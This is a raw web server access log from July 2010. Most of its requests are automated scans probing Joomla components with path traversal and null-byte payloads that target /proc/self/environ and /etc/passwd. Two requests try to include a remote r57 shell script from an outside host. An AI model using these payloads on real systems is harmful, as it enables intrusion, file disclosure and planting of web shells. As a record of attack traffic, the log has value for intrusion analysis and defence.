74.55.73.74 - - [28/Jul/2010:02:44:15 +0200] "GET /logs/index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
74.55.73.74 - - [28/Jul/2010:02:44:15 +0200] "GET /index.php?option=com_multiroot&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:02:44:38 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:02:44:38 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:02:44:38 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:02:45:08 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:02:45:08 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:02:45:09 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
207.46.195.224 - - [28/Jul/2010:02:47:30 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.224 - - [28/Jul/2010:02:52:02 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.6.194 - - [28/Jul/2010:02:52:16 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:02:53:04 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:02:53:05 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:55:38 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:55:41 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:02:55:52 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:02:55:53 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:02:56:23 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
174.121.191.5 - - [28/Jul/2010:02:57:38 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:57:38 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:57:38 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:57:38 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:57:38 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:57:39 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:03:02:58 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:03:02:58 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:03:02:58 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:03:15:58 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:03:15:59 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:03:15:59 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
67.195.114.225 - - [28/Jul/2010:03:40:02 +0200] "GET /?C=M;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
178.162.133.106 - - [28/Jul/2010:04:16:42 +0200] "GET /logs/?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:04:16:43 +0200] "GET /?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:04:17:14 +0200] "GET /logs/?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:04:17:14 +0200] "GET /?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:04:22:56 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:04:22:57 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
202.160.123.72 - - [28/Jul/2010:04:28:42 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:04:28:48 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:04:30:52 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:04:33:38 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
74.63.43.172 - - [28/Jul/2010:04:43:35 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:43:41 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:49:46 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:49:46 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:49:46 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:49:49 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:49:49 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.834"
74.63.43.172 - - [28/Jul/2010:04:49:49 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.834"
202.160.123.72 - - [28/Jul/2010:05:01:09 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:05:19:18 +0200] "GET /logs/access_log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:05:19:19 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:05:19:25 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:05:21:34 +0200] "GET /logs/access_log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:05:21:35 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:05:21:35 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
74.52.6.194 - - [28/Jul/2010:05:39:36 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:05:43:15 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
74.52.6.194 - - [28/Jul/2010:05:47:56 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:05:47:57 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:05:47:57 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:05:53:26 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:05:53:26 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:05:53:27 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
74.52.6.194 - - [28/Jul/2010:05:53:53 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:05:53:54 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:05:53:54 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
88.198.191.249 - - [28/Jul/2010:06:26:20 +0200] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:20 +0200] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:20 +0200] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:20 +0200] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:21 +0200] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:21 +0200] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:21 +0200] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
88.198.191.249 - - [28/Jul/2010:06:26:21 +0200] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
65.55.37.186 - - [28/Jul/2010:07:40:22 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.186 - - [28/Jul/2010:07:40:23 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.204.191 - - [28/Jul/2010:07:48:13 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.191 - - [28/Jul/2010:07:54:30 +0200] "GET /?C=M;O=A HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.3.192 - - [28/Jul/2010:08:38:24 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)._"
65.55.3.192 - - [28/Jul/2010:08:38:24 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)._"
46.98.70.222 - - [28/Jul/2010:08:38:41 +0200] "GET /logs/error_log/ HTTP/1.0" 404 301 "http://newark.comites-it.org/logs/error_log/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
46.98.70.222 - - [28/Jul/2010:08:38:41 +0200] "GET / HTTP/1.0" 200 559 "http://newark.comites-it.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
140.128.174.15 - - [28/Jul/2010:08:53:47 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
41.78.28.104 - - [28/Jul/2010:08:55:13 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
41.78.28.104 - - [28/Jul/2010:08:55:14 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
140.128.174.15 - - [28/Jul/2010:09:25:22 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
140.128.174.15 - - [28/Jul/2010:09:25:22 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
140.128.174.15 - - [28/Jul/2010:09:25:22 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
189.1.171.233 - - [28/Jul/2010:09:29:14 +0200] "GET //index.php?option=com_jacomment&view=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
189.1.171.233 - - [28/Jul/2010:09:29:14 +0200] "GET /logs//index.php?option=com_jacomment&view=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
41.78.28.104 - - [28/Jul/2010:09:32:21 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
41.78.28.104 - - [28/Jul/2010:09:32:21 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
41.78.28.104 - - [28/Jul/2010:09:32:23 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
41.78.28.104 - - [28/Jul/2010:09:32:30 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
41.78.28.104 - - [28/Jul/2010:09:32:34 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
41.78.28.104 - - [28/Jul/2010:09:32:36 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
76.242.100.234 - - [28/Jul/2010:09:36:10 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [28/Jul/2010:09:36:10 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [28/Jul/2010:09:36:15 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [28/Jul/2010:09:36:15 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
87.98.217.83 - - [28/Jul/2010:09:43:15 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:09:43:15 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
76.242.100.234 - - [28/Jul/2010:09:47:15 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [28/Jul/2010:09:47:15 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
213.180.89.75 - - [28/Jul/2010:10:13:32 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
207.46.13.99 - - [28/Jul/2010:10:13:37 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.21.153.139 - - [28/Jul/2010:10:19:48 +0200] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
95.131.68.185 - - [28/Jul/2010:10:20:48 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
62.44.82.118 - - [28/Jul/2010:10:21:25 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
207.46.13.99 - - [28/Jul/2010:10:21:31 +0200] "GET /?C=N;O=D HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.180.89.75 - - [28/Jul/2010:10:28:33 +0200] "GET /logs/access_log/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:10:28:33 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
213.180.89.75 - - [28/Jul/2010:10:28:33 +0200] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
62.44.82.118 - - [28/Jul/2010:10:37:11 +0200] "GET /logs/error_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-" "libwww-perl/5.803"
62.44.82.118 - - [28/Jul/2010:10:37:11 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
62.44.82.118 - - [28/Jul/2010:10:37:11 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
189.21.153.139 - - [28/Jul/2010:10:37:42 +0200] "GET /logs/access_log/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
189.21.153.139 - - [28/Jul/2010:10:37:43 +0200] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
189.21.153.139 - - [28/Jul/2010:10:37:43 +0200] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
95.131.68.185 - - [28/Jul/2010:10:47:33 +0200] "GET /logs/error_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-" "libwww-perl/5.810"
95.131.68.185 - - [28/Jul/2010:10:47:34 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
95.131.68.185 - - [28/Jul/2010:10:47:34 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
95.108.150.235 - - [28/Jul/2010:11:13:43 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [28/Jul/2010:11:13:44 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [28/Jul/2010:11:13:45 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
66.71.245.122 - - [28/Jul/2010:11:22:26 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.71.245.122 - - [28/Jul/2010:11:22:26 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
219.94.194.248 - - [28/Jul/2010:11:28:43 +0200] "GET /logs/?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
219.94.194.248 - - [28/Jul/2010:11:28:43 +0200] "GET /?option=com_jequoteform&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
66.71.245.122 - - [28/Jul/2010:11:39:17 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.71.245.122 - - [28/Jul/2010:11:39:17 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
67.195.114.225 - - [28/Jul/2010:11:55:40 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.225 - - [28/Jul/2010:11:55:41 +0200] "GET /?C=D;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.191.5 - - [28/Jul/2010:12:22:36 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
91.121.141.186 - - [28/Jul/2010:12:25:28 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.141.186 - - [28/Jul/2010:12:25:29 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:12:25:38 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [28/Jul/2010:12:25:39 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
99.198.108.74 - - [28/Jul/2010:12:28:39 +0200] "GET /logs/*.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
